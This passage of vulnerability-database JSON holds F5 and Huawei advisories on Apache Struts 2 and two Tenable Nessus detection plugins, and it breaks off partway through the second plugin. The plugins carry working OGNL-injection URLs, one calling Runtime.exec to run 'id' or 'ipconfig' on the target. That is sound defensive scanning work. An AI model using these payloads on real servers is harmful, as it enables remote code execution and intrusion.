"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-16T00:00:00", "id": "SOL14933", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:09", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15262 - Apache Struts vulnerability CVE-2014-0113", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15262", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:08", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15261 - Apache Struts vulnerability CVE-2014-0112", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15261", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:18", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15260 - Apache Struts vulnerability CVE-2014-0094", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15260", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:33", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-26T02:09:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2017-03-13T23:05:00", "id": "F5:K17588029", "href": "https://support.f5.com/csp/article/K17588029", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:59", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-25T00:00:00", "type": "f5", "title": "SOL17588029 - Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2016-04-29T00:00:00", "id": "SOL17588029", "href": "http://support.f5.com/kb/en-us/solutions/public/k/17/sol17588029.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "huawei": [{"lastseen": "2021-12-30T12:28:06", "description": "Apache Struts2 is a second-generation and enterprise-ready Java web application framework based on the Model-View-Controller (MVC) architecture. This advisory describes four vulnerabilities of Apache Struts 2.0.0 - 2.3.15. Huawei products and applications using the above versions of Apache Struts are therefore affected by the vulnerabilities, not due to a defect of the Huawei product or application.\n\nThe Apache Struts2 contains the vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks.( Vulnerability ID : HWNSIRT-2013-0601) The link is at [http://struts.apache.org/release/2.3.x/docs/s2-014.html ](<http://struts.apache.org/release/2.3.x/docs/s2-014.html%20>)(CVE-2013-2115, CVE-2013-1966)\n\nThe Apache Struts2 contains the vulnerability introduced by wildcard matching mechanism or double evaluation of OGNL Expression allows remote command execution.( Vulnerability ID : HWNSIRT-2013-0704) The link is at <http://struts.apache.org/release/2.3.x/docs/s2-015.html> (CVE-2013-2134, CVE-2013-2135)\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"action:\"/\"redirect:\"/\"redirectAction:\", which may result in remote command execution. (Vulnerability ID : HWNSIRT-2013-0705) .The link is at <http://struts.apache.org/release/2.3.x/docs/s2-016.html> ([CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>)).\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"redirect:\"/\"redirectAction:\" which allows open redirects. (Vulnerability ID : HWNSIRT-2013-0706). The link is at <http://struts.apache.org/release/2.3.x/docs/s2-017.html> (CVE-2013-2248). \n\nApache released Struts 2.3.15.1 as an official patch for Struts 2. Upgrading to Struts 2.3.15.1 is the only workaround. Based on the Struts 2.3.15.1 patch, Huawei provides a fix for the vulnerability. \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-30T00:00:00", "type": "huawei", "title": "Security Advisory-Multiple Apache Struts2 Vulnerabilities in Huawei Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-08T00:00:00", "id": "HUAWEI-SA-20130730-STRUTS", "href": "https://www.huawei.com/en/psirt/security-advisories/2013/hw-276819", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T15:38:38", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by multiple cross-site scripting (XSS) vulnerabilities as well as session access and manipulation attacks; however, Nessus has not tested for these issues. \n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66935);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1965\", \"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60082, 60166, 60167);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-014.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp /.do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"/${%23context['xwork.MethodAccessor.denyMethod\" +\n \"Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true),\" +\n \"(@java.lang.Runtime@getRuntime()).exec('\" +cmd+ \"').waitFor()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/(0)?\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:39:03", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66931);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-015.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\nforeach url (urls)\n{\n magic = rand();\n vuln = FALSE;\n\n vuln_url = url + \"/${\" + magic + \"+5}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"404 Not Found\") &&\n ((magic + 5) >< res[2])\n )\n {\n vuln = TRUE;\n output = strstr(res[2], \"<h1>\");\n break;\n }\n\n msg = SCRIPT_NAME - \".nasl\" + \"-\" + magic;\n vuln_url = url + \"/${%23w%3d%23context.get('com.opensymphony.xwork2.\" +\n \"dispatcher.HttpServletResponse').getWriter(),\"+\n \"%23w.print('Nessus%20Response:%20'),%23w.println('\" +msg+\n \"'),%23w.flush(),%23w.close()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ \"^Nessus Response: \"+msg)\n )\n {\n vuln = TRUE;\n output = chomp(res[2]);\n break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n 